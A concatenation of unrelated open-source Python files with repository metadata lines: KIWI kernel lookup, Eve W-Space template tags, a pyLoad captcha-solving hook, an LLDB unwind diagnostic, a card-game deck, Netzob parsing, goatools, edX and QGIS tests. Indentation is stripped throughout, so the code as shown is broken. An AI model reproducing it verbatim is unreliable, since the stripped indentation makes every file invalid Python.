def __init__(self, root_dir):
self.root_dir = root_dir
self.kernel_names = self._setup_kernel_names_for_lookup()
def get_kernel(self, raise_on_not_found=False):
"""
Lookup kernel files and provide filename and version
:param bool raise_on_not_found: sets the method to raise an exception
if the kernel is not found
:raises KiwiKernelLookupError: if raise_on_not_found flag is active
and kernel is not found
:return: tuple with filename, kernelname and version
:rtype: namedtuple
"""
for kernel_name in self.kernel_names:
kernel_file = os.sep.join(
[self.root_dir, 'boot', kernel_name]
)
if os.path.exists(kernel_file):
version_match = re.match(
'.*?-(.*)', os.path.basename(kernel_file)
)
if version_match:
version = version_match.group(1)
kernel = namedtuple(
'kernel', ['name', 'filename', 'version']
)
return kernel(
name=os.path.basename(os.path.realpath(kernel_file)),
filename=kernel_file,
version=version
)
if raise_on_not_found:
raise KiwiKernelLookupError(
'No kernel found in {0}, searched for {1}'.format(
os.sep.join([self.root_dir, 'boot']),
','.join(self.kernel_names)
)
)
def get_xen_hypervisor(self):
"""
Lookup xen hypervisor and provide filename and hypervisor name
:return: tuple with filename and hypervisor name
:rtype: namedtuple
"""
xen_hypervisor = self.root_dir + '/boot/xen.gz'
if os.path.exists(xen_hypervisor):
xen = namedtuple(
'xen', ['filename', 'name']
)
return xen(
filename=xen_hypervisor,
name='xen.gz'
)
def copy_kernel(self, target_dir, file_name=None):
"""
Copy kernel to specified target
If no file_name is given the target filename is set
as kernel-<kernel.version>.kernel
:param str target_dir: target path name
:param str filename: base filename in target
"""
kernel = self.get_kernel()
if kernel:
if not file_name:
file_name = 'kernel-' + kernel.version + '.kernel'
target_file = ''.join(
[target_dir, '/', file_name]
)
Command.run(['cp', kernel.filename, target_file])
def copy_xen_hypervisor(self, target_dir, file_name=None):
"""
Copy xen hypervisor to specified target
If no file_name is given the target filename is set
as hypervisor-<xen.name>
:param str target_dir: target path name
:param str filename: base filename in target
"""
xen = self.get_xen_hypervisor()
if xen:
if not file_name:
file_name = 'hypervisor-' + xen.name
target_file = ''.join(
[target_dir, '/', file_name]
)
Command.run(['cp', xen.filename, target_file])
def _setup_kernel_names_for_lookup(self):
"""
The kernel image name is different per arch and distribution
This method returns a list of possible kernel image names in
order to search and find one of them
:return: list of kernel image names
:rtype: list
"""
kernel_names = []
kernel_dirs = sorted(
os.listdir(''.join([self.root_dir, '/lib/modules']))
)
if kernel_dirs:
# append lookup for the real kernel image names
# depending on the arch and os they are different
# in their prefix
kernel_prefixes = [
'uImage', 'Image', 'zImage', 'vmlinuz', 'image', 'vmlinux'
]
kernel_name_pattern = '{prefix}-{name}'
for kernel_prefix in kernel_prefixes:
for kernel_dir in kernel_dirs:
kernel_names.append(
kernel_name_pattern.format(
prefix=kernel_prefix, name=kernel_dir
)
)
return kernel_names
| b1-systems/kiwi | kiwi/system/kernel.py | Python | gpl-3.0 | 5,751 |
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django import template
from POS.models import CorpPOS
from POS.utils import add_status_info
register=template.Library()
@register.inclusion_tag('posstatus.html')
def myposstatus(user):
#Get list of POSes where user is the manager
poses = CorpPOS.objects.filter(manager=user)
#Get status information and return
status = add_status_info(poses)
return {'posstatus': status}
@register.inclusion_tag('posstatus.html')
def corpposstatus(user):
#If we have the 'can_see_all_pos' permission, show all corp POSes.
#If we do not, then only show those with manager = None
if user.has_perm('POS.can_see_all_pos'):
poses = CorpPOS.objects.all()
else:
poses = CorpPOS.objects.filter(manager=None)
#Add status info and return
status = add_status_info(poses)
return {'posstatus': status}
@register.inclusion_tag('posstatus_detail.html')
def posstatusdetails(status):
return {'pos': status}
| reactormonk/eve-wspace | evewspace/POS/templatetags/posstatus.py | Python | gpl-3.0 | 1,782 |
# -*- coding: utf-8 -*-
from __future__ import with_statement
import base64
import uuid
import pycurl
from module.network.HTTPRequest import BadHeader
from module.network.RequestFactory import getRequest as get_request
from module.plugins.internal.Addon import Addon
from module.plugins.internal.misc import threaded
class ExpertDecoders(Addon):
__name__ = "ExpertDecoders"
__type__ = "hook"
__version__ = "0.09"
__status__ = "testing"
__config__ = [("activated", "bool", "Activated", False),
("passkey", "password", "Access key", ""),
("check_client", "bool", "Don't use if client is connected", True)]
__description__ = """Send captchas to expertdecoders.com"""
__license__ = "GPLv3"
__authors__ = [("RaNaN", "RaNaN@pyload.org"),
("zoidberg", "zoidberg@mujmail.cz")]
API_URL = "http://www.fasttypers.org/imagepost.ashx"
def get_credits(self):
res = self.load(
self.API_URL,
post={
'key': self.config.get('passkey'),
'action': "balance"})
if res.isdigit():
self.log_info(_("%s credits left") % res)
self.info['credits'] = credits = int(res)
return credits
else:
self.log_error(res)
return 0
@threaded
def _process_captcha(self, task):
task.data['ticket'] = ticket = uuid.uuid4()
result = None
with open(task.captchaFile, 'rb') as f:
data = f.read()
req = get_request()
#: Raise timeout threshold
req.c.setopt(pycurl.LOW_SPEED_TIME, 80)
try:
result = self.load(self.API_URL,
post={'action': "upload",
'key': self.config.get('passkey'),
'file': base64.b64encode(data),
'gen_task_id': ticket},
req=req)
finally:
req.close()
self.log_debug("Result %s : %s" % (ticket, result))
task.setResult(result)
def captcha_task(self, task):
if not task.isTextual():
return False
if not self.config.get('passkey'):
return False
if self.pyload.isClientConnected() and self.config.get('check_client'):
return False
if self.get_credits() > 0:
task.handler.append(self)
task.setWaiting(100)
self._process_captcha(task)
else:
self.log_info(
_("Your ExpertDecoders Account has not enough credits"))
def captcha_invalid(self, task):
if "ticket" in task.data:
try:
res = self.load(self.API_URL,
post={'action': "refund", 'key': self.config.get('passkey'), 'gen_task_id': task.data['ticket']})
self.log_info(_("Request refund"), res)
except BadHeader as e:
self.log_error(_("Could not send refund request"), e)
| rlindner81/pyload | module/plugins/hooks/ExpertDecoders.py | Python | gpl-3.0 | 3,102 |
# This implements the "diagnose-unwind" command, usually installed
# in the debug session like
# command script import lldb.diagnose
# it is used when lldb's backtrace fails -- it collects and prints
# information about the stack frames, and tries an alternate unwind
# algorithm, that will help to understand why lldb's unwind algorithm
# did not succeed.
import optparse
import lldb
import re
import shlex
# Print the frame number, pc, frame pointer, module UUID and function name
# Returns the SBModule that contains the PC, if it could be found
def backtrace_print_frame (target, frame_num, addr, fp):
process = target.GetProcess()
addr_for_printing = addr
addr_width = process.GetAddressByteSize() * 2
if frame_num > 0:
addr = addr - 1
sbaddr = lldb.SBAddress()
try:
sbaddr.SetLoadAddress(addr, target)
module_description = ""
if sbaddr.GetModule():
module_filename = ""
module_uuid_str = sbaddr.GetModule().GetUUIDString()
if module_uuid_str == None:
module_uuid_str = ""
if sbaddr.GetModule().GetFileSpec():
module_filename = sbaddr.GetModule().GetFileSpec().GetFilename()
if module_filename == None:
module_filename = ""
if module_uuid_str != "" or module_filename != "":
module_description = '%s %s' % (module_filename, module_uuid_str)
except Exception:
print '%2d: pc==0x%-*x fp==0x%-*x' % (frame_num, addr_width, addr_for_printing, addr_width, fp)
return
sym_ctx = target.ResolveSymbolContextForAddress(sbaddr, lldb.eSymbolContextEverything)
if sym_ctx.IsValid() and sym_ctx.GetSymbol().IsValid():
function_start = sym_ctx.GetSymbol().GetStartAddress().GetLoadAddress(target)
offset = addr - function_start
print '%2d: pc==0x%-*x fp==0x%-*x %s %s + %d' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description, sym_ctx.GetSymbol().GetName(), offset)
else:
print '%2d: pc==0x%-*x fp==0x%-*x %s' % (frame_num, addr_width, addr_for_printing, addr_width, fp, module_description)
return sbaddr.GetModule()
# A simple stack walk algorithm that follows the frame chain.
# Returns a two-element list; the first element is a list of modules
# seen and the second element is a list of addresses seen during the backtrace.
def simple_backtrace(debugger):
target = debugger.GetSelectedTarget()
process = target.GetProcess()
cur_thread = process.GetSelectedThread()
initial_fp = cur_thread.GetFrameAtIndex(0).GetFP()
# If the pseudoreg "fp" isn't recognized, on arm hardcode to r7 which is correct for Darwin programs.
if initial_fp == lldb.LLDB_INVALID_ADDRESS and target.triple[0:3] == "arm":
for reggroup in cur_thread.GetFrameAtIndex(1).registers:
if reggroup.GetName() == "General Purpose Registers":
for reg in reggroup:
if reg.GetName() == "r7":
initial_fp = int (reg.GetValue(), 16)
module_list = []
address_list = [cur_thread.GetFrameAtIndex(0).GetPC()]
this_module = backtrace_print_frame (target, 0, cur_thread.GetFrameAtIndex(0).GetPC(), initial_fp)
print_stack_frame (process, initial_fp)
print ""
if this_module != None:
module_list.append (this_module)
if cur_thread.GetNumFrames() < 2:
return [module_list, address_list]
cur_fp = process.ReadPointerFromMemory (initial_fp, lldb.SBError())
cur_pc = process.ReadPointerFromMemory (initial_fp + process.GetAddressByteSize(), lldb.SBError())
frame_num = 1
while cur_pc != 0 and cur_fp != 0 and cur_pc != lldb.LLDB_INVALID_ADDRESS and cur_fp != lldb.LLDB_INVALID_ADDRESS:
address_list.append (cur_pc)
this_module = backtrace_print_frame (target, frame_num, cur_pc, cur_fp)
print_stack_frame (process, cur_fp)
print ""
if this_module != None:
module_list.append (this_module)
frame_num = frame_num + 1
next_pc = 0
next_fp = 0
if target.triple[0:6] == "x86_64" or target.triple[0:4] == "i386" or target.triple[0:3] == "arm":
error = lldb.SBError()
next_pc = process.ReadPointerFromMemory(cur_fp + process.GetAddressByteSize(), error)
if not error.Success():
next_pc = 0
next_fp = process.ReadPointerFromMemory(cur_fp, error)
if not error.Success():
next_fp = 0
# Clear the 0th bit for arm frames - this indicates it is a thumb frame
if target.triple[0:3] == "arm" and (next_pc & 1) == 1:
next_pc = next_pc & ~1
cur_pc = next_pc
cur_fp = next_fp
this_module = backtrace_print_frame (target, frame_num, cur_pc, cur_fp)
print_stack_frame (process, cur_fp)
print ""
if this_module != None:
module_list.append (this_module)
return [module_list, address_list]
def print_stack_frame(process, fp):
if fp == 0 or fp == lldb.LLDB_INVALID_ADDRESS or fp == 1:
return
addr_size = process.GetAddressByteSize()
addr = fp - (2 * addr_size)
i = 0
outline = "Stack frame from $fp-%d: " % (2 * addr_size)
error = lldb.SBError()
try:
while i < 5 and error.Success():
address = process.ReadPointerFromMemory(addr + (i * addr_size), error)
outline += " 0x%x" % address
i += 1
print outline
except Exception:
return
def diagnose_unwind(debugger, command, result, dict):
"""
Gather diagnostic information to help debug incorrect unwind (backtrace)
behavior in lldb. When there is a backtrace that doesn't look
correct, run this command with the correct thread selected and a
large amount of diagnostic information will be printed, it is likely
to be helpful when reporting the problem.
"""
command_args = shlex.split(command)
parser = create_diagnose_unwind_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
target = debugger.GetSelectedTarget()
if target:
process = target.GetProcess()
if process:
thread = process.GetSelectedThread()
if thread:
lldb_versions_match = re.search(r'[lL][lL][dD][bB]-(\d+)([.](\d+))?([.](\d+))?', debugger.GetVersionString())
lldb_version = 0
lldb_minor = 0
if len(lldb_versions_match.groups()) >= 1 and lldb_versions_match.groups()[0]:
lldb_major = int(lldb_versions_match.groups()[0])
if len(lldb_versions_match.groups()) >= 5 and lldb_versions_match.groups()[4]:
lldb_minor = int(lldb_versions_match.groups()[4])
modules_seen = []
addresses_seen = []
print 'LLDB version %s' % debugger.GetVersionString()
print 'Unwind diagnostics for thread %d' % thread.GetIndexID()
print ""
print "============================================================================================="
print ""
print "OS plugin setting:"
debugger.HandleCommand("settings show target.process.python-os-plugin-path")
print ""
print "Live register context:"
thread.SetSelectedFrame(0)
debugger.HandleCommand("register read")
print ""
print "============================================================================================="
print ""
print "lldb's unwind algorithm:"
print ""
frame_num = 0
for frame in thread.frames:
if not frame.IsInlined():
this_module = backtrace_print_frame (target, frame_num, frame.GetPC(), frame.GetFP())
print_stack_frame (process, frame.GetFP())
print ""
if this_module != None:
modules_seen.append (this_module)
addresses_seen.append (frame.GetPC())
frame_num = frame_num + 1
print ""
print "============================================================================================="
print ""
print "Simple stack walk algorithm:"
print ""
(module_list, address_list) = simple_backtrace(debugger)
if module_list and module_list != None:
modules_seen += module_list
if address_list and address_list != None:
addresses_seen = set(addresses_seen)
addresses_seen.update(set(address_list))
print ""
print "============================================================================================="
print ""
print "Modules seen in stack walks:"
print ""
modules_already_seen = set()
for module in modules_seen:
if module != None and module.GetFileSpec().GetFilename() != None:
if not module.GetFileSpec().GetFilename() in modules_already_seen:
debugger.HandleCommand('image list %s' % module.GetFileSpec().GetFilename())
modules_already_seen.add(module.GetFileSpec().GetFilename())
print ""
print "============================================================================================="
print ""
print "Disassembly ofaddresses seen in stack walks:"
print ""
additional_addresses_to_disassemble = addresses_seen
for frame in thread.frames:
if not frame.IsInlined():
print "--------------------------------------------------------------------------------------"
print ""
print "Disassembly of %s, frame %d, address 0x%x" % (frame.GetFunctionName(), frame.GetFrameID(), frame.GetPC())
print ""
if target.triple[0:6] == "x86_64" or target.triple[0:4] == "i386":
debugger.HandleCommand('disassemble -F att -a 0x%x' % frame.GetPC())
else:
debugger.HandleCommand('disassemble -a 0x%x' % frame.GetPC())
if frame.GetPC() in additional_addresses_to_disassemble:
additional_addresses_to_disassemble.remove (frame.GetPC())
for address in list(additional_addresses_to_disassemble):
print "--------------------------------------------------------------------------------------"
print ""
print "Disassembly of 0x%x" % address
print ""
if target.triple[0:6] == "x86_64" or target.triple[0:4] == "i386":
debugger.HandleCommand('disassemble -F att -a 0x%x' % address)
else:
debugger.HandleCommand('disassemble -a 0x%x' % address)
print ""
print "============================================================================================="
print ""
additional_addresses_to_show_unwind = addresses_seen
for frame in thread.frames:
if not frame.IsInlined():
print "--------------------------------------------------------------------------------------"
print ""
print "Unwind instructions for %s, frame %d" % (frame.GetFunctionName(), frame.GetFrameID())
print ""
debugger.HandleCommand('image show-unwind -a "0x%x"' % frame.GetPC())
if frame.GetPC() in additional_addresses_to_show_unwind:
additional_addresses_to_show_unwind.remove (frame.GetPC())
for address in list(additional_addresses_to_show_unwind):
print "--------------------------------------------------------------------------------------"
print ""
print "Unwind instructions for 0x%x" % address
print ""
debugger.HandleCommand('image show-unwind -a "0x%x"' % address)
def create_diagnose_unwind_options():
usage = "usage: %prog"
description='''Print diagnostic information about a thread backtrace which will help to debug unwind problems'''
parser = optparse.OptionParser(description=description, prog='diagnose_unwind',usage=usage)
return parser
lldb.debugger.HandleCommand('command script add -f %s.diagnose_unwind diagnose-unwind' % __name__)
print 'The "diagnose-unwind" command has been installed, type "help diagnose-unwind" for detailed help.'
| s20121035/rk3288_android5.1_repo | external/lldb/examples/python/diagnose_unwind.py | Python | gpl-3.0 | 11,798 |
'''
Created on Nov 3, 2016
The set of cards in the deck
@author: mjw
'''
from random import randint
from .Baron import Baron
from .Countess import Countess
from .Prince import Prince
from .Priest import Priest
from .Princess import Princess
from .King import King
from .Guard import Guard
from .Handmaid import Handmaid
import random
class Deck(object):
'''
The Deck contains all the cards in the game. Notably, it instantiates
itself with a random permutation of the standard Love Letter deck and
exposes a way to draw from this random permutation.
'''
unshuffled = [Princess, Countess, King, Prince, Prince,
Handmaid, Handmaid, Baron, Baron, Priest,
Priest, Guard, Guard, Guard, Guard, Guard]
def __init__(self):
'''
Randomly pull constructors out of the unshuffled list. Don't pull the
same one twice. Then create an instance and add to the deck
'''
self.shuffled = []
for clazz in Deck.unshuffled:
self.shuffled.append(clazz())
# now shuffle
random.shuffle(self.shuffled)
def size(self):
return len(self.shuffled)
def getCard(self):
if len(self.shuffled) == 0:
return None
else:
top = self.shuffled[0]
self.shuffled = self.shuffled[1:]
return top | matthewjwolff/LoveLetter | engine/Deck.py | Python | gpl-3.0 | 1,402 |
# -*- coding: utf-8 -*-
# +---------------------------------------------------------------------------+
# | 01001110 01100101 01110100 01111010 01101111 01100010 |
# | |
# | Netzob : Inferring communication protocols |
# +---------------------------------------------------------------------------+
# | Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
# | This program is free software: you can redistribute it and/or modify |
# | it under the terms of the GNU General Public License as published by |
# | the Free Software Foundation, either version 3 of the License, or |
# | (at your option) any later version. |
# | |
# | This program is distributed in the hope that it will be useful, |
# | but WITHOUT ANY WARRANTY; without even the implied warranty of |
# | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
# | GNU General Public License for more details. |
# | |
# | You should have received a copy of the GNU General Public License |
# | along with this program. If not, see <http://www.gnu.org/licenses/>. |
# +---------------------------------------------------------------------------+
# | @url : http://www.netzob.org |
# | @contact : contact@netzob.org |
# | @sponsors : Amossys, http://www.amossys.fr |
# | Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
# +---------------------------------------------------------------------------+
# +---------------------------------------------------------------------------+
# | File contributors : |
# | - Georges Bossert <georges.bossert (a) supelec.fr> |
# | - Frédéric Guihéry <frederic.guihery (a) amossys.fr> |
# +---------------------------------------------------------------------------+
# +---------------------------------------------------------------------------+
# | Standard library imports |
# +---------------------------------------------------------------------------+
import random
from bitarray import bitarray
# +---------------------------------------------------------------------------+
# | Related third party imports |
# +---------------------------------------------------------------------------+
# +---------------------------------------------------------------------------+
# | Local application imports |
# +---------------------------------------------------------------------------+
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Vocabulary.Domain.Variables.Nodes.AbstractVariableNode import AbstractVariableNode
from netzob.Common.Models.Vocabulary.Domain.Parser.ParsingPath import ParsingPath
from netzob.Common.Models.Vocabulary.Domain.Specializer.SpecializingPath import SpecializingPath
@NetzobLogger
class Repeat(AbstractVariableNode):
"""Represents a Repeat in the domain definition
Let's see how a repeat domain can be parsed
>>> from netzob.all import *
>>> f1 = Field(Repeat(ASCII("netzob"), nbRepeat=(1, 4)))
>>> f2 = Field(ASCII("zoby"))
>>> s = Symbol([f1, f2])
>>> msg1 = RawMessage("netzobnetzobzoby")
>>> mp = MessageParser()
>>> print mp.parseMessage(msg1, s)
[bitarray('011011100110010101110100011110100110111101100010011011100110010101110100011110100110111101100010'), bitarray('01111010011011110110001001111001')]
You can also specify a delimitor between each repeated element
>>> from netzob.all import *
>>> f1 = Field(Repeat(Alt([ASCII("netzob"), ASCII("zoby")]), nbRepeat=(1, 4), delimitor=TypeConverter.convert(";", Raw, BitArray)))
>>> f2 = Field(ASCII("zoby"))
>>> s = Symbol([f1, f2])
>>> msg1 = RawMessage("netzob;zoby;netzobzoby")
>>> mp = MessageParser()
>>> print mp.parseMessage(msg1, s)
[bitarray('011011100110010101110100011110100110111101100010001110110111101001101111011000100111100100111011011011100110010101110100011110100110111101100010'), bitarray('01111010011011110110001001111001')]
Let's illustrate the specialization of a repeat:
>>> from netzob.all import *
>>> f1 = Field(Repeat(ASCII("netzob"), nbRepeat=2))
>>> s = Symbol([f1])
>>> print s.specialize()
netzobnetzob
>>> from netzob.all import *
>>> f1 = Field(Repeat(IPv4(), nbRepeat=3, delimitor=TypeConverter.convert(";", Raw, BitArray)))
>>> s = Symbol([f1])
>>> gen = s.specialize()
>>> len(gen) == 14
True
>>> gen.count(";")
2
>>> from netzob.all import *
>>> child = Data(dataType=ASCII(nbChars=(5)), svas=SVAS.PERSISTENT)
>>> f1 = Field(Repeat(child, nbRepeat=3, delimitor=TypeConverter.convert(";", Raw, BitArray)))
>>> s = Symbol([f1])
>>> gen = s.specialize()
>>> gen == gen[:5]+";"+gen[:5]+";"+gen[:5]
True
"""
def __init__(self, child, nbRepeat, delimitor=None):
super(Repeat, self).__init__(self.__class__.__name__, [child])
self.nbRepeat = nbRepeat
self.delimitor = delimitor
@typeCheck(ParsingPath)
def parse(self, parsingPath, carnivorous=False):
"""Parse the content with the definition domain of the Repeat
"""
if parsingPath is None:
raise Exception("Parsing path cannot be None")
# retrieve the data to parse
dataToParse = parsingPath.getDataAssignedToVariable(self).copy()
# remove any data assigned to this variable
parsingPath.removeAssignedDataToVariable(self)
self._logger.debug("Parse '{0}' as {1} with parser path '{2}'".format(dataToParse, self, parsingPath))
results = []
# we try to parse according to the various different number of repetitions
for i_repeat in xrange(self.nbRepeat[0], self.nbRepeat[1]):
newParsingPaths = [parsingPath.duplicate()]
newParsingPaths[0].assignDataToVariable(dataToParse.copy(), self.children[0])
for i in xrange(i_repeat):
tmp_result = []
for newParsingPath in newParsingPaths:
childParsingPaths = self.children[0].parse(newParsingPath, carnivorous=carnivorous)
for childParsingPath in childParsingPaths:
if childParsingPath.isDataAvailableForVariable(self):
newResult = childParsingPath.getDataAssignedToVariable(self).copy()
newResult += childParsingPath.getDataAssignedToVariable(self.children[0])
else:
newResult = childParsingPath.getDataAssignedToVariable(self.children[0])
childParsingPath.addResult(self, newResult)
childParsingPath.assignDataToVariable(dataToParse.copy()[len(newResult):], self.children[0])
if self.delimitor is not None:
if i < i_repeat - 1:
# check the delimitor is available
toParse = childParsingPath.getDataAssignedToVariable(self.children[0]).copy()
if toParse[:len(self.delimitor)] == self.delimitor:
newResult = childParsingPath.getDataAssignedToVariable(self).copy() + self.delimitor
childParsingPath.addResult(self, newResult)
childParsingPath.assignDataToVariable(dataToParse.copy()[len(newResult):], self.children[0])
tmp_result.append(childParsingPath)
else:
tmp_result.append(childParsingPath)
else:
tmp_result.append(childParsingPath)
newParsingPaths = tmp_result
for newParsingPath in newParsingPaths:
results.append(newParsingPath)
return results
@typeCheck(SpecializingPath)
def specialize(self, originalSpecializingPath):
"""Specializes a Repeat"""
if originalSpecializingPath is None:
raise Exception("Specializing path cannot be None")
# initialy, there is a unique path to specialize (the provided one)
specializingPaths = []
for i_repeat in xrange(self.nbRepeat[0], self.nbRepeat[1]):
newSpecializingPaths = [originalSpecializingPath.duplicate()]
for i in xrange(i_repeat):
childSpecializingPaths = []
for newSpecializingPath in newSpecializingPaths:
for path in self.children[0].specialize(newSpecializingPath):
if path.isDataAvailableForVariable(self):
newResult = path.getDataAssignedToVariable(self).copy()
if self.delimitor is not None:
newResult += self.delimitor
newResult += path.getDataAssignedToVariable(self.children[0])
else:
newResult = path.getDataAssignedToVariable(self.children[0])
path.addResult(self, newResult)
childSpecializingPaths.append(path)
newSpecializingPaths = childSpecializingPaths
specializingPaths.extend(newSpecializingPaths)
# lets shuffle this ( :) ) >>> by default we only consider the first valid parsing path.
random.shuffle(specializingPaths)
return specializingPaths
@property
def nbRepeat(self):
return self.__nbRepeat
@nbRepeat.setter
def nbRepeat(self, nbRepeat):
if nbRepeat is None:
raise Exception("NB Repeat cannot be None")
MAX_REPEAT = 1000
if isinstance(nbRepeat, int):
nbRepeat = (nbRepeat, nbRepeat + 1)
if isinstance(nbRepeat, tuple):
minNbRepeat, maxNbRepeat = nbRepeat
if minNbRepeat is not None and not isinstance(minNbRepeat, int):
raise TypeError("NbRepeat must be defined with a tuple of int")
if maxNbRepeat is not None and not isinstance(maxNbRepeat, int):
raise TypeError("NbRepeat must be defined with a tuple of int")
if minNbRepeat is None:
minNbRepeat = 0
if minNbRepeat < 0:
raise ValueError("Minimum nbRepeat must be greater than 0")
if maxNbRepeat is not None and maxNbRepeat < minNbRepeat:
raise ValueError("Maximum must be greater or equals to the minimum")
if maxNbRepeat is not None and maxNbRepeat > MAX_REPEAT:
raise ValueError("Maximum nbRepeat supported for a variable is {0}.".format(MAX_REPEAT))
self.__nbRepeat = (minNbRepeat, maxNbRepeat)
@property
def delimitor(self):
return self.__delimitor
@delimitor.setter
@typeCheck(bitarray)
def delimitor(self, delimitor):
self.__delimitor = delimitor
| dasbruns/netzob | src/netzob/Common/Models/Vocabulary/Domain/Variables/Nodes/Repeat.py | Python | gpl-3.0 | 11,690 |
#!/usr/bin/env python
"""Full set of annotations can be used to set TermCounts. No need to break it up."""
# https://github.com/tanghaibao/goatools/issues/88
from __future__ import print_function
import os
import sys
from goatools.semantic import TermCounts
from goatools.base import get_godag
from goatools.associations import read_annotations
REPO = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")
def test_semantic_i88():
"""Full set of annotations can be used to set TermCounts. No need to break it up."""
godag = get_godag("go-basic.obo")
# Associations
fin_gaf = os.path.join(REPO, "tair.gaf")
gene2gos_all = read_annotations(gaf=fin_gaf, namespace='ALL')
gene2gos_bp = read_annotations(gaf=fin_gaf, namespace='BP')
gene2gos_mf = read_annotations(gaf=fin_gaf, namespace='MF')
gene2gos_cc = read_annotations(gaf=fin_gaf, namespace='CC')
# Termcounts
prt = sys.stdout
termcounts_all = TermCounts(godag, gene2gos_all, prt=prt)
termcounts_bp = TermCounts(godag, gene2gos_bp, prt=prt)
termcounts_mf = TermCounts(godag, gene2gos_mf, prt=prt)
termcounts_cc = TermCounts(godag, gene2gos_cc, prt=prt)
# Test content in subset is the same as in the full GO counts
for goid, cnt in termcounts_bp.gocnts.items():
assert termcounts_all.gocnts[goid] == cnt
for goid, cnt in termcounts_mf.gocnts.items():
assert termcounts_all.gocnts[goid] == cnt
for goid, cnt in termcounts_cc.gocnts.items():
assert termcounts_all.gocnts[goid] == cnt
if __name__ == '__main__':
test_semantic_i88()
| tanghaibao/goatools | tests/semantic_ns.py | Python | bsd-2-clause | 1,596 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
import xmodule_django.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CourseAuthorization',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('course_id', xmodule_django.models.CourseKeyField(unique=True, max_length=255, db_index=True)),
('email_enabled', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='CourseEmail',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('slug', models.CharField(max_length=128, db_index=True)),
('subject', models.CharField(max_length=128, blank=True)),
('html_message', models.TextField(null=True, blank=True)),
('text_message', models.TextField(null=True, blank=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('course_id', xmodule_django.models.CourseKeyField(max_length=255, db_index=True)),
('to_option', models.CharField(default=b'myself', max_length=64, choices=[(b'myself', b'Myself'), (b'staff', b'Staff and instructors'), (b'all', b'All')])),
('template_name', models.CharField(max_length=255, null=True)),
('from_addr', models.CharField(max_length=255, null=True)),
('sender', models.ForeignKey(default=1, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='CourseEmailTemplate',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('html_template', models.TextField(null=True, blank=True)),
('plain_template', models.TextField(null=True, blank=True)),
('name', models.CharField(max_length=255, unique=True, null=True, blank=True)),
],
),
migrations.CreateModel(
name='Optout',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('course_id', xmodule_django.models.CourseKeyField(max_length=255, db_index=True)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),
('force_disabled', models.BooleanField(default=False)),
],
),
migrations.AlterUniqueTogether(
name='optout',
unique_together=set([('user', 'course_id')]),
),
]
| nttks/edx-platform | lms/djangoapps/bulk_email/migrations/0001_initial.py | Python | agpl-3.0 | 3,047 |
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsLocator.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2017 by Nyall Dawson'
__date__ = '6/05/2017'
__copyright__ = 'Copyright 2017, The QGIS Project'
import qgis # NOQA
import os
from qgis.core import (QgsLocator,
QgsLocatorFilter,
QgsLocatorContext,
QgsLocatorResult,
QgsLocatorModel,
QgsLocatorProxyModel,
QgsLocatorAutomaticModel,
QgsSettings)
from qgis.PyQt.QtCore import QVariant, pyqtSignal, QCoreApplication
from time import sleep
from qgis.testing import start_app, unittest
from qgis.PyQt import sip
start_app()
class test_filter(QgsLocatorFilter):
def __init__(self, identifier, prefix=None, groupResult=False, parent=None):
super().__init__(parent)
self.identifier = identifier
self._prefix = prefix
self.groupResult = groupResult
def clone(self):
return test_filter(self.identifier, self.prefix, self.groupResult)
def name(self):
return 'test_' + self.identifier
def displayName(self):
return 'test_' + self.identifier
def description(self):
return 'test_description'
def prefix(self):
return self._prefix
def fetchResults(self, string, context, feedback):
n = 3 if not self.groupResult else 9
for i in range(n):
if feedback.isCanceled():
return
sleep(0.001)
result = QgsLocatorResult()
result.displayString = self.identifier + str(i)
if self.groupResult:
if i in (0, 1, 3, 5, 6):
result.group = 'first group'
elif i in (4, 8):
result.group = 'second group'
self.resultFetched.emit(result)
def triggerResult(self, result):
pass
def priority(self):
if self.identifier == 'a':
return QgsLocatorFilter.High
elif self.identifier == 'b':
return QgsLocatorFilter.Medium
elif self.identifier == 'c':
return QgsLocatorFilter.Low
else:
return QgsLocatorFilter.Medium
class TestQgsLocator(unittest.TestCase):
def testRegisteringFilters(self):
l = QgsLocator()
filter_a = test_filter('a')
filter_b = test_filter('b')
l.registerFilter(filter_a)
l.registerFilter(filter_b)
self.assertEqual(set(l.filters()), {filter_a, filter_b})
# ownership should be transferred to locator
del l
self.assertTrue(sip.isdeleted(filter_a))
self.assertTrue(sip.isdeleted(filter_b))
# try manually deregistering
l = QgsLocator()
filter_c = test_filter('c')
filter_d = test_filter('d')
l.registerFilter(filter_c)
l.registerFilter(filter_d)
self.assertEqual(set(l.filters()), {filter_c, filter_d})
l.deregisterFilter(filter_c)
self.assertTrue(sip.isdeleted(filter_c))
